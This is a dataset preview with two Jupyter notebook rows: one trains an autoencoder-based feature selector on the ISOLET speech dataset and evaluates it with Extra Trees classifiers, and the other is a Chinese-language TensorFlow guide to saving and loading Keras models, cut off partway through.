text stringlengths 2.5k 6.39M | kind stringclasses 3
values |
|---|---|
# 1. Import libraries
```
#----------------------------Reproducible----------------------------------------------------------------------------------------
import numpy as np
import tensorflow as tf
import random as rn
import os
seed=0
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
rn.seed(seed)
#session_conf = tf.ConfigProto(intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
session_conf =tf.compat.v1.ConfigProto(intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
from keras import backend as K
#tf.set_random_seed(seed)
tf.compat.v1.set_random_seed(seed)
#sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
sess = tf.compat.v1.Session(graph=tf.compat.v1.get_default_graph(), config=session_conf)
K.set_session(sess)
#----------------------------Reproducible----------------------------------------------------------------------------------------
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
#--------------------------------------------------------------------------------------------------------------------------------
from keras.datasets import mnist
from keras.models import Model
from keras.layers import Dense, Input, Flatten, Activation, Dropout, Layer
from keras.layers.normalization import BatchNormalization
from keras.utils import to_categorical
from keras import optimizers,initializers,constraints,regularizers
from keras import backend as K
from keras.callbacks import LambdaCallback,ModelCheckpoint
from keras.utils import plot_model
from sklearn.model_selection import StratifiedKFold
from sklearn.ensemble import ExtraTreesClassifier
from sklearn import svm
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import ShuffleSplit
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
import h5py
import math
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.cm as cm
%matplotlib inline
matplotlib.style.use('ggplot')
import pandas as pd
from sklearn.impute import SimpleImputer
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler
import scipy.sparse as sparse
#--------------------------------------------------------------------------------------------------------------------------------
#Import ourslef defined methods
import sys
sys.path.append(r"./Defined")
import Functions as F
# The following code should be added before the keras model
#np.random.seed(seed)
```
# 2. Loading data
```
train_data_frame=np.array(pd.read_csv('./Dataset/isolet1+2+3+4.data',header=None))
test_data_frame=np.array(pd.read_csv('./Dataset/isolet5.data',header=None))
train_data_arr=(train_data_frame[:,0:617]).copy()
train_label_arr=((train_data_frame[:,617]).copy()-1)
test_data_arr=(test_data_frame[:,0:617]).copy()
test_label_arr=((test_data_frame[:,617]).copy()-1)
train_data_arr.shape
test_data_arr.shape
np.r_[train_data_arr,test_data_arr].shape
Data=MinMaxScaler(feature_range=(0,1)).fit_transform(np.r_[train_data_arr,test_data_arr])
Data.shape
C_train_x=Data[:len(train_data_arr)]
C_test_x=Data[len(train_data_arr):]
C_train_y=train_label_arr#to_categorical(train_label_arr)
C_test_y=test_label_arr#to_categorical(test_label_arr)
x_train,x_validate,y_train_onehot,y_validate_onehot= train_test_split(C_train_x,C_train_y,test_size=0.1,random_state=seed)
x_test=C_test_x
y_test_onehot=C_test_y
print('Shape of x_train: ' + str(x_train.shape))
print('Shape of x_validate: ' + str(x_validate.shape))
print('Shape of x_test: ' + str(x_test.shape))
print('Shape of y_train: ' + str(y_train_onehot.shape))
print('Shape of y_validate: ' + str(y_validate_onehot.shape))
print('Shape of y_test: ' + str(y_test_onehot.shape))
print('Shape of C_train_x: ' + str(C_train_x.shape))
print('Shape of C_train_y: ' + str(C_train_y.shape))
print('Shape of C_test_x: ' + str(C_test_x.shape))
print('Shape of C_test_y: ' + str(C_test_y.shape))
key_feture_number=85
```
# 3.Model
```
np.random.seed(seed)
#--------------------------------------------------------------------------------------------------------------------------------
class Feature_Select_Layer(Layer):
def __init__(self, output_dim, **kwargs):
super(Feature_Select_Layer, self).__init__(**kwargs)
self.output_dim = output_dim
def build(self, input_shape):
self.kernel = self.add_weight(name='kernel',
shape=(input_shape[1],),
initializer=initializers.RandomUniform(minval=0.999999, maxval=0.9999999, seed=seed),
trainable=True)
super(Feature_Select_Layer, self).build(input_shape)
def call(self, x, selection=False,k=key_feture_number):
kernel=K.abs(self.kernel)
if selection:
kernel_=K.transpose(kernel)
kth_largest = tf.math.top_k(kernel_, k=k)[0][-1]
kernel = tf.where(condition=K.less(kernel,kth_largest),x=K.zeros_like(kernel),y=kernel)
return K.dot(x, tf.linalg.tensor_diag(kernel))
def compute_output_shape(self, input_shape):
return (input_shape[0], self.output_dim)
#--------------------------------------------------------------------------------------------------------------------------------
def Autoencoder(p_data_feature=x_train.shape[1],\
p_encoding_dim=key_feture_number,\
p_learning_rate= 1E-3):
input_img = Input(shape=(p_data_feature,), name='input_img')
encoded = Dense(p_encoding_dim, activation='linear',kernel_initializer=initializers.glorot_uniform(seed))(input_img)
bottleneck=encoded
decoded = Dense(p_data_feature, activation='linear',kernel_initializer=initializers.glorot_uniform(seed))(encoded)
latent_encoder = Model(input_img, bottleneck)
autoencoder = Model(input_img, decoded)
autoencoder.compile(loss='mean_squared_error', optimizer=optimizers.Adam(lr=p_learning_rate))
print('Autoencoder Structure-------------------------------------')
autoencoder.summary()
#print('Latent Encoder Structure-------------------------------------')
#latent_encoder.summary()
return autoencoder,latent_encoder
#--------------------------------------------------------------------------------------------------------------------------------
def Identity_Autoencoder(p_data_feature=x_train.shape[1],\
p_encoding_dim=key_feture_number,\
p_learning_rate= 1E-3):
input_img = Input(shape=(p_data_feature,), name='autoencoder_input')
feature_selection = Feature_Select_Layer(output_dim=p_data_feature,\
input_shape=(p_data_feature,),\
name='feature_selection')
feature_selection_score=feature_selection(input_img)
encoded = Dense(p_encoding_dim,\
activation='linear',\
kernel_initializer=initializers.glorot_uniform(seed),\
name='autoencoder_hidden_layer')
encoded_score=encoded(feature_selection_score)
bottleneck_score=encoded_score
decoded = Dense(p_data_feature,\
activation='linear',\
kernel_initializer=initializers.glorot_uniform(seed),\
name='autoencoder_output')
decoded_score =decoded(bottleneck_score)
latent_encoder_score = Model(input_img, bottleneck_score)
autoencoder = Model(input_img, decoded_score)
autoencoder.compile(loss='mean_squared_error',\
optimizer=optimizers.Adam(lr=p_learning_rate))
print('Autoencoder Structure-------------------------------------')
autoencoder.summary()
return autoencoder,latent_encoder_score
#--------------------------------------------------------------------------------------------------------------------------------
def Fractal_Autoencoder(p_data_feature=x_train.shape[1],\
p_feture_number=key_feture_number,\
p_encoding_dim=key_feture_number,\
p_learning_rate=1E-3,\
p_loss_weight_1=1,\
p_loss_weight_2=2):
input_img = Input(shape=(p_data_feature,), name='autoencoder_input')
feature_selection = Feature_Select_Layer(output_dim=p_data_feature,\
input_shape=(p_data_feature,),\
name='feature_selection')
feature_selection_score=feature_selection(input_img)
feature_selection_choose=feature_selection(input_img,selection=True,k=p_feture_number)
encoded = Dense(p_encoding_dim,\
activation='linear',\
kernel_initializer=initializers.glorot_uniform(seed),\
name='autoencoder_hidden_layer')
encoded_score=encoded(feature_selection_score)
encoded_choose=encoded(feature_selection_choose)
bottleneck_score=encoded_score
bottleneck_choose=encoded_choose
decoded = Dense(p_data_feature,\
activation='linear',\
kernel_initializer=initializers.glorot_uniform(seed),\
name='autoencoder_output')
decoded_score =decoded(bottleneck_score)
decoded_choose =decoded(bottleneck_choose)
latent_encoder_score = Model(input_img, bottleneck_score)
latent_encoder_choose = Model(input_img, bottleneck_choose)
feature_selection_output=Model(input_img,feature_selection_choose)
autoencoder = Model(input_img, [decoded_score,decoded_choose])
autoencoder.compile(loss=['mean_squared_error','mean_squared_error'],\
loss_weights=[p_loss_weight_1, p_loss_weight_2],\
optimizer=optimizers.Adam(lr=p_learning_rate))
print('Autoencoder Structure-------------------------------------')
autoencoder.summary()
return autoencoder,feature_selection_output,latent_encoder_score,latent_encoder_choose
```
## 3.1 Structure and paramter testing
```
epochs_number=200
batch_size_value=64
```
---
### 3.1.1 Fractal Autoencoder
---
```
loss_weight_1=0.0078125
F_AE,\
feature_selection_output,\
latent_encoder_score_F_AE,\
latent_encoder_choose_F_AE=Fractal_Autoencoder(p_data_feature=x_train.shape[1],\
p_feture_number=key_feture_number,\
p_encoding_dim=key_feture_number,\
p_learning_rate= 1E-3,\
p_loss_weight_1=loss_weight_1,\
p_loss_weight_2=1)
#file_name="./log/F_AE_"+str(key_feture_number)+".png"
#plot_model(F_AE, to_file=file_name,show_shapes=True)
model_checkpoint=ModelCheckpoint('./log_weights/F_AE_'+str(key_feture_number)+'_weights_'+str(loss_weight_1)+'.{epoch:04d}.hdf5',period=100,save_weights_only=True,verbose=1)
#print_weights = LambdaCallback(on_epoch_end=lambda batch, logs: print(F_AE.layers[1].get_weights()))
F_AE_history = F_AE.fit(x_train, [x_train,x_train],\
epochs=epochs_number,\
batch_size=batch_size_value,\
shuffle=True,\
validation_data=(x_validate, [x_validate,x_validate]),\
callbacks=[model_checkpoint])
loss = F_AE_history.history['loss']
val_loss = F_AE_history.history['val_loss']
epochs = range(epochs_number)
plt.plot(epochs, loss, 'bo', label='Training Loss')
plt.plot(epochs, val_loss, 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
plt.plot(epochs[250:], loss[250:], 'bo', label='Training Loss')
plt.plot(epochs[250:], val_loss[250:], 'r', label='Validation Loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
p_data=F_AE.predict(x_test)
numbers=x_test.shape[0]*x_test.shape[1]
print("MSE for one-to-one map layer",np.sum(np.power(np.array(p_data)[0]-x_test,2))/numbers)
print("MSE for feature selection layer",np.sum(np.power(np.array(p_data)[1]-x_test,2))/numbers)
```
---
### 3.1.2 Feature selection layer output
---
```
FS_layer_output=feature_selection_output.predict(x_test)
print(np.sum(FS_layer_output[0]>0))
```
---
### 3.1.3 Key features show
---
```
key_features=F.top_k_keepWeights_1(F_AE.get_layer(index=1).get_weights()[0],key_feture_number)
print(np.sum(F_AE.get_layer(index=1).get_weights()[0]>0))
```
# 4 Classifying
### 4.1 Extra Trees
```
train_feature=C_train_x
train_label=C_train_y
test_feature=C_test_x
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
selected_position_list=np.where(key_features>0)[0]
```
---
#### 4.1.1. On Identity Selection layer
---
a) with zeros
```
train_feature=feature_selection_output.predict(C_train_x)
print("train_feature>0: ",np.sum(train_feature[0]>0))
print(train_feature.shape)
train_label=C_train_y
test_feature=feature_selection_output.predict(C_test_x)
print("test_feature>0: ",np.sum(test_feature[0]>0))
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
b) Sparse matrix
```
train_feature=feature_selection_output.predict(C_train_x)
print(train_feature.shape)
train_label=C_train_y
test_feature=feature_selection_output.predict(C_test_x)
print(test_feature.shape)
test_label=C_test_y
train_feature_sparse=sparse.coo_matrix(train_feature)
test_feature_sparse=sparse.coo_matrix(test_feature)
p_seed=seed
F.ETree(train_feature_sparse,train_label,test_feature_sparse,test_label,p_seed)
```
---
c) Compression
```
train_feature_=feature_selection_output.predict(C_train_x)
train_feature=F.compress_zero(train_feature_,key_feture_number)
print(train_feature.shape)
train_label=C_train_y
test_feature_=feature_selection_output.predict(C_test_x)
test_feature=F.compress_zero(test_feature_,key_feture_number)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
d) Compression with structure
```
train_feature_=feature_selection_output.predict(C_train_x)
train_feature=F.compress_zero_withkeystructure(train_feature_,selected_position_list)
print(train_feature.shape)
train_label=C_train_y
test_feature_=feature_selection_output.predict(C_test_x)
test_feature=F.compress_zero_withkeystructure(test_feature_,selected_position_list)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
#### 4.1.2. On Original Selection
---
a) with zeros
```
train_feature=np.multiply(C_train_x, key_features)
print("train_feature>0: ",np.sum(train_feature[0]>0))
print(train_feature.shape)
train_label=C_train_y
test_feature=np.multiply(C_test_x, key_features)
print("test_feature>0: ",np.sum(test_feature[0]>0))
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
b) Sparse matrix
```
train_feature=np.multiply(C_train_x, key_features)
print(train_feature.shape)
train_label=C_train_y
test_feature=np.multiply(C_test_x, key_features)
print(test_feature.shape)
test_label=C_test_y
train_feature_sparse=sparse.coo_matrix(train_feature)
test_feature_sparse=sparse.coo_matrix(test_feature)
p_seed=seed
F.ETree(train_feature_sparse,train_label,test_feature_sparse,test_label,p_seed)
```
---
c) Compression
```
train_feature_=np.multiply(C_train_x, key_features)
train_feature=F.compress_zero(train_feature_,key_feture_number)
print(train_feature.shape)
train_label=C_train_y
test_feature_=np.multiply(C_test_x, key_features)
test_feature=F.compress_zero(test_feature_,key_feture_number)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
d) Compression with structure
```
train_feature_=np.multiply(C_train_x, key_features)
train_feature=F.compress_zero_withkeystructure(train_feature_,selected_position_list)
print(train_feature.shape)
train_label=C_train_y
test_feature_=np.multiply(C_test_x, key_features)
test_feature=F.compress_zero_withkeystructure(test_feature_,selected_position_list)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
---
#### 4.1.3. Latent space
---
```
train_feature=latent_encoder_score_F_AE.predict(C_train_x)
print(train_feature.shape)
train_label=C_train_y
test_feature=latent_encoder_score_F_AE.predict(C_test_x)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
train_feature=latent_encoder_choose_F_AE.predict(C_train_x)
print(train_feature.shape)
train_label=C_train_y
test_feature=latent_encoder_choose_F_AE.predict(C_test_x)
print(test_feature.shape)
test_label=C_test_y
p_seed=seed
F.ETree(train_feature,train_label,test_feature,test_label,p_seed)
```
# 6. Reconstruction loss
```
from sklearn.linear_model import LinearRegression
def mse_check(train, test):
LR = LinearRegression(n_jobs = -1)
LR.fit(train[0], train[1])
MSELR = ((LR.predict(test[0]) - test[1]) ** 2).mean()
return MSELR
train_feature_=np.multiply(C_train_x, key_features)
C_train_selected_x=F.compress_zero_withkeystructure(train_feature_,selected_position_list)
print(C_train_selected_x.shape)
test_feature_=np.multiply(C_test_x, key_features)
C_test_selected_x=F.compress_zero_withkeystructure(test_feature_,selected_position_list)
print(C_test_selected_x.shape)
train_feature_tuple=(C_train_selected_x,C_train_x)
test_feature_tuple=(C_test_selected_x,C_test_x)
reconstruction_loss=mse_check(train_feature_tuple, test_feature_tuple)
print(reconstruction_loss)
```
| github_jupyter |
##### Copyright 2020 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# 保存和加载 Keras 模型
<table class="tfo-notebook-buttons" align="left">
<td><a target="_blank" href="https://tensorflow.google.cn/guide/keras/save_and_serialize" class=""><img src="https://tensorflow.google.cn/images/tf_logo_32px.png" class="">在 TensorFlow.org 上查看 </a></td>
<td><a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/zh-cn/guide/keras/save_and_serialize.ipynb" class=""><img src="https://tensorflow.google.cn/images/colab_logo_32px.png">在 Google Colab 中运行</a></td>
<td><a target="_blank" href="https://github.com/tensorflow/docs-l10n/blob/master/site/zh-cn/guide/keras/save_and_serialize.ipynb" class=""><img src="https://tensorflow.google.cn/images/GitHub-Mark-32px.png">在 GitHub 上查看源代码</a></td>
<td><a href="https://storage.googleapis.com/tensorflow_docs/docs-l10n/site/zh-cn/guide/keras/save_and_serialize.ipynb" class=""><img src="https://tensorflow.google.cn/images/download_logo_32px.png">下载笔记本</a></td>
</table>
## 简介
Keras 模型由多个组件组成:
- 架构或配置,它指定模型包含的层及其连接方式。
- 一组权重值(即“模型的状态”)。
- 优化器(通过编译模型来定义)。
- 一组损失和指标(通过编译模型或通过调用 `add_loss()` 或 `add_metric()` 来定义)。
您可以通过 Keras API 将这些片段一次性保存到磁盘,或仅选择性地保存其中一些片段:
- 将所有内容以 TensorFlow SavedModel 格式(或较早的 Keras H5 格式)保存到单个归档。这是标准做法。
- 仅保存架构/配置,通常保存为 JSON 文件。
- 仅保存权重值。通常在训练模型时使用。
下面我们来看看每个选项:什么时候选择其中哪个选项?它们是如何工作的?
## 对于保存和加载的简短回答
如果您只有 10 秒钟来阅读本指南,则您只需了解以下内容。
**保存 Keras 模型:**
```python
model = ... # Get model (Sequential, Functional Model, or Model subclass) model.save('path/to/location')
```
**将模型加载回来:**
```python
from tensorflow import keras model = keras.models.load_model('path/to/location')
```
现在,我们来看看详细内容。
## 设置
```
import numpy as np
import tensorflow as tf
from tensorflow import keras
```
## 保存和加载整个模型
您可以将整个模型保存到单个工件中。它将包括:
- 模型的架构/配置
- 模型的权重值(在训练过程中学习)
- 模型的编译信息(如果调用了 `compile()`)
- 优化器及其状态(如果有的话,使您可以从上次中断的位置重新开始训练)
#### API
- `model.save()` 或 `tf.keras.models.save_model()`
- `tf.keras.models.load_model()`
您可以使用两种格式将整个模型保存到磁盘:**TensorFlow SavedModel 格式**和**较早的 Keras H5 格式**。推荐使用 SavedModel 格式。它是使用 `model.save()` 时的默认格式。
您可以通过以下方式切换到 H5 格式:
- 将 `save_format='h5'` 传递给 `save()`。
- 将以 `.h5` 或 `.keras` 结尾的文件名传递给 `save()`。
### SavedModel 格式
**示例:**
```
def get_model():
# Create a simple model.
inputs = keras.Input(shape=(32,))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
model.compile(optimizer="adam", loss="mean_squared_error")
return model
model = get_model()
# Train the model.
test_input = np.random.random((128, 32))
test_target = np.random.random((128, 1))
model.fit(test_input, test_target)
# Calling `save('my_model')` creates a SavedModel folder `my_model`.
model.save("my_model")
# It can be used to reconstruct the model identically.
reconstructed_model = keras.models.load_model("my_model")
# Let's check:
np.testing.assert_allclose(
model.predict(test_input), reconstructed_model.predict(test_input)
)
# The reconstructed model is already compiled and has retained the optimizer
# state, so training can resume:
reconstructed_model.fit(test_input, test_target)
```
#### SavedModel 包含的内容
调用 `model.save('my_model')` 会创建一个名为 `my_model` 的文件夹,其包含以下内容:
```
!ls my_model
```
模型架构和训练配置(包括优化器、损失和指标)存储在 `saved_model.pb` 中。权重保存在 `variables/` 目录下。
有关 SavedModel 格式的详细信息,请参阅 [SavedModel 指南(*磁盘上的 SavedModel 格式*)](https://tensorflow.google.cn/guide/saved_model#the_savedmodel_format_on_disk)。
#### SavedModel 处理自定义对象的方式
保存模型和模型的层时,SavedModel 格式会存储类名称、**调用函数**、损失和权重(如果已实现,则还包括配置)。调用函数会定义模型/层的计算图。
如果没有模型/层配置,调用函数会被用来创建一个与原始模型类似的模型,该模型可以被训练、评估和用于推断。
尽管如此,在编写自定义模型或层类时,对 `get_config` 和 `from_config` 方法进行定义始终是一种好的做法。这样您就可以稍后根据需要轻松更新计算。有关详细信息,请参阅[自定义对象](save_and_serialize.ipynb#custom-objects)。
以下示例演示了在**没有**重写配置方法的情况下,从 SavedModel 格式加载自定义层所发生的情况。
```
class CustomModel(keras.Model):
def __init__(self, hidden_units):
super(CustomModel, self).__init__()
self.dense_layers = [keras.layers.Dense(u) for u in hidden_units]
def call(self, inputs):
x = inputs
for layer in self.dense_layers:
x = layer(x)
return x
model = CustomModel([16, 16, 10])
# Build the model by calling it
input_arr = tf.random.uniform((1, 5))
outputs = model(input_arr)
model.save("my_model")
# Delete the custom-defined model class to ensure that the loader does not have
# access to it.
del CustomModel
loaded = keras.models.load_model("my_model")
np.testing.assert_allclose(loaded(input_arr), outputs)
print("Original model:", model)
print("Loaded model:", loaded)
```
如上例所示,加载器动态地创建了一个与原始模型行为类似的新模型。
### Keras H5 格式
Keras 还支持保存单个 HDF5 文件,其中包含模型的架构、权重值和 `compile()` 信息。它是 SavedModel 的轻量化替代选择。
**示例:**
```
model = get_model()
# Train the model.
test_input = np.random.random((128, 32))
test_target = np.random.random((128, 1))
model.fit(test_input, test_target)
# Calling `save('my_model.h5')` creates a h5 file `my_model.h5`.
model.save("my_h5_model.h5")
# It can be used to reconstruct the model identically.
reconstructed_model = keras.models.load_model("my_h5_model.h5")
# Let's check:
np.testing.assert_allclose(
model.predict(test_input), reconstructed_model.predict(test_input)
)
# The reconstructed model is already compiled and has retained the optimizer
# state, so training can resume:
reconstructed_model.fit(test_input, test_target)
```
#### 限制
与 SavedModel 格式相比,H5 文件不包括以下两方面内容:
- 通过 `model.add_loss()` 和 `model.add_metric()` 添加的**外部损失和指标**不会被保存(这与 SavedModel 不同)。如果您的模型有此类损失和指标且您想要恢复训练,则您需要在加载模型后自行重新添加这些损失。请注意,这不适用于通过 `self.add_loss()` 和 `self.add_metric()` 在层*内*创建的损失/指标。只要该层被加载,这些损失和指标就会被保留,因为它们是该层 `call` 方法的一部分。
- 已保存的文件中不包含**自定义对象(如自定义层)的计算图**。在加载时,Keras 需要访问这些对象的 Python 类/函数以重建模型。请参阅[自定义对象](save_and_serialize.ipynb#custom-objects)。
## 保存架构
模型的配置(或架构)指定模型包含的层,以及这些层的连接方式*。如果您有模型的配置,则可以使用权重的新初始化状态创建模型,而无需编译信息。
*请注意,这仅适用于使用函数式或序列式 API 定义的模型,不适用于子类化模型。
### 序贯模型或函数式 API 模型的配置
这些类型的模型是显式的层计算图:它们的配置始终以结构化形式提供。
#### API
- `get_config()` 和 `from_config()`
- `tf.keras.models.model_to_json()` 和 `tf.keras.models.model_from_json()`
#### `get_config()` 和 `from_config()`
调用 `config = model.get_config()` 将返回一个包含模型配置的 Python 字典。然后可以通过 `Sequential.from_config(config)`(针对 `Sequential` 模型)或 `Model.from_config(config)`(针对函数式 API 模型)重建同一模型。
相同的工作流也适用于任何可序列化的层。
**层示例:**
```
layer = keras.layers.Dense(3, activation="relu")
layer_config = layer.get_config()
new_layer = keras.layers.Dense.from_config(layer_config)
```
**序贯模型示例:**
```
model = keras.Sequential([keras.Input((32,)), keras.layers.Dense(1)])
config = model.get_config()
new_model = keras.Sequential.from_config(config)
```
**函数式模型示例:**
```
inputs = keras.Input((32,))
outputs = keras.layers.Dense(1)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
new_model = keras.Model.from_config(config)
```
#### `to_json()` 和 `tf.keras.models.model_from_json()`
这与 `get_config` / `from_config` 类似,不同之处在于它会将模型转换成 JSON 字符串,之后该字符串可以在没有原始模型类的情况下进行加载。它还特定于模型,不适用于层。
**示例:**
```
model = keras.Sequential([keras.Input((32,)), keras.layers.Dense(1)])
json_config = model.to_json()
new_model = keras.models.model_from_json(json_config)
```
### 自定义对象
**模型和层**
子类化模型和层的架构在 `__init__` 和 `call` 方法中进行定义。它们被视为 Python 字节码,无法将其序列化为兼容 JSON 的配置,您可以尝试对字节码进行序列化(例如通过 `pickle`),但这样做极不安全,因为模型将无法在其他系统上进行加载。
为了保存/加载带有自定义层的模型或子类化模型,您应该重写 `get_config` 和 `from_config`(可选)方法。此外,您应该注册自定义对象,以便 Keras 能够感知它。
**自定义函数**
自定义函数(如激活损失或初始化)不需要 `get_config` 方法。只需将函数名称注册为自定义对象,就足以进行加载。
**仅加载 TensorFlow 计算图**
您可以加载由 Keras 生成的 TensorFlow 计算图。要进行此类加载,您无需提供任何 `custom_objects`。您可以执行以下代码进行加载:
```
model.save("my_model")
tensorflow_graph = tf.saved_model.load("my_model")
x = np.random.uniform(size=(4, 32)).astype(np.float32)
predicted = tensorflow_graph(x).numpy()
```
请注意,此方法有几个缺点:
- 由于可追溯性原因,您应该始终可以访问所使用的自定义对象。您不会希望将无法重新创建的模型投入生产。
- `tf.saved_model.load` 返回的对象不是 Keras 模型,因此不太容易使用。例如,您将无法访问 `.predict()` 或 `.fit()`。
虽然不鼓励使用此方法,但当您遇到棘手问题(例如,您丢失了自定义对象的代码,或在使用 `tf.keras.models.load_model()` 加载模型时遇到了问题)时,它还是能够提供帮助。
有关详细信息,请参阅 [`tf.saved_model.load` 相关页面](https://tensorflow.google.cn/api_docs/python/tf/saved_model/load)。
#### 定义配置方法
规范:
- `get_config` 应该返回一个 JSON 可序列化字典,以便兼容 Keras 节省架构和模型的 API。
- `from_config(config)` (`classmethod`) 应该返回一个根据配置创建的新层或新模型对象。默认实现返回 `cls(**config)`。
**示例:**
```
class CustomLayer(keras.layers.Layer):
def __init__(self, a):
self.var = tf.Variable(a, name="var_a")
def call(self, inputs, training=False):
if training:
return inputs * self.var
else:
return inputs
def get_config(self):
return {"a": self.var.numpy()}
# There's actually no need to define `from_config` here, since returning
# `cls(**config)` is the default behavior.
@classmethod
def from_config(cls, config):
return cls(**config)
layer = CustomLayer(5)
layer.var.assign(2)
serialized_layer = keras.layers.serialize(layer)
new_layer = keras.layers.deserialize(
serialized_layer, custom_objects={"CustomLayer": CustomLayer}
)
```
#### 注册自定义对象
Keras 会对生成了配置的类进行记录。在上例中,`tf.keras.layers.serialize` 生成了自定义层的序列化形式:
```
{'class_name': 'CustomLayer', 'config': {'a': 2}}
```
Keras 会保留所有内置的层、模型、优化器和指标的主列表,用于查找正确的类以调用 `from_config`。如果找不到该类,则会引发错误(`Value Error: Unknown layer`)。有几种方法可以将自定义类注册到此列表中:
1. 在加载函数中设置 `custom_objects` 参数。(请参阅上文“定义配置方法”部分中的示例)
2. `tf.keras.utils.custom_object_scope` 或 `tf.keras.utils.CustomObjectScope`
3. `tf.keras.utils.register_keras_serializable`
#### 自定义层和函数示例
```
class CustomLayer(keras.layers.Layer):
def __init__(self, units=32, **kwargs):
super(CustomLayer, self).__init__(**kwargs)
self.units = units
def build(self, input_shape):
self.w = self.add_weight(
shape=(input_shape[-1], self.units),
initializer="random_normal",
trainable=True,
)
self.b = self.add_weight(
shape=(self.units,), initializer="random_normal", trainable=True
)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
def get_config(self):
config = super(CustomLayer, self).get_config()
config.update({"units": self.units})
return config
def custom_activation(x):
return tf.nn.tanh(x) ** 2
# Make a model with the CustomLayer and custom_activation
inputs = keras.Input((32,))
x = CustomLayer(32)(inputs)
outputs = keras.layers.Activation(custom_activation)(x)
model = keras.Model(inputs, outputs)
# Retrieve the config
config = model.get_config()
# At loading time, register the custom objects with a `custom_object_scope`:
custom_objects = {"CustomLayer": CustomLayer, "custom_activation": custom_activation}
with keras.utils.custom_object_scope(custom_objects):
new_model = keras.Model.from_config(config)
```
### 内存中模型克隆
您还可以通过 `tf.keras.models.clone_model()` 在内存中克隆模型。这相当于获取模型的配置,然后通过配置重建模型(因此它不会保留编译信息或层的权重值)。
**示例:**
```
with keras.utils.custom_object_scope(custom_objects):
new_model = keras.models.clone_model(model)
```
## 仅保存和加载模型的权重值
您可以选择仅保存和加载模型的权重。这可能对以下情况有用:
- 您只需使用模型进行推断:在这种情况下,您无需重新开始训练,因此不需要编译信息或优化器状态。
- 您正在进行迁移学习:在这种情况下,您需要重用先前模型的状态来训练新模型,因此不需要先前模型的编译信息。
### 用于内存中权重迁移的 API
您可以使用 `get_weights` 和 `set_weights` 在不同对象之间复制权重:
- `tf.keras.layers.Layer.get_weights()`:返回 Numpy 数组列表。
- `tf.keras.layers.Layer.set_weights()`:将模型权重设置为 `weights` 参数中的值。
示例如下。
***在内存中将权重从一层转移到另一层***
```
def create_layer():
layer = keras.layers.Dense(64, activation="relu", name="dense_2")
layer.build((None, 784))
return layer
layer_1 = create_layer()
layer_2 = create_layer()
# Copy weights from layer 2 to layer 1
layer_2.set_weights(layer_1.get_weights())
```
***在内存中将权重从一个模型转移到具有兼容架构的另一个模型***
```
# Create a simple functional model
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
# Define a subclassed model with the same architecture
class SubclassedModel(keras.Model):
def __init__(self, output_dim, name=None):
super(SubclassedModel, self).__init__(name=name)
self.output_dim = output_dim
self.dense_1 = keras.layers.Dense(64, activation="relu", name="dense_1")
self.dense_2 = keras.layers.Dense(64, activation="relu", name="dense_2")
self.dense_3 = keras.layers.Dense(output_dim, name="predictions")
def call(self, inputs):
x = self.dense_1(inputs)
x = self.dense_2(x)
x = self.dense_3(x)
return x
def get_config(self):
return {"output_dim": self.output_dim, "name": self.name}
subclassed_model = SubclassedModel(10)
# Call the subclassed model once to create the weights.
subclassed_model(tf.ones((1, 784)))
# Copy weights from functional_model to subclassed_model.
subclassed_model.set_weights(functional_model.get_weights())
assert len(functional_model.weights) == len(subclassed_model.weights)
for a, b in zip(functional_model.weights, subclassed_model.weights):
np.testing.assert_allclose(a.numpy(), b.numpy())
```
***无状态层的情况***
因为无状态层不会改变权重的顺序或数量,所以即便存在额外的/缺失的无状态层,模型也可以具有兼容架构。
```
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
# Add a dropout layer, which does not contain any weights.
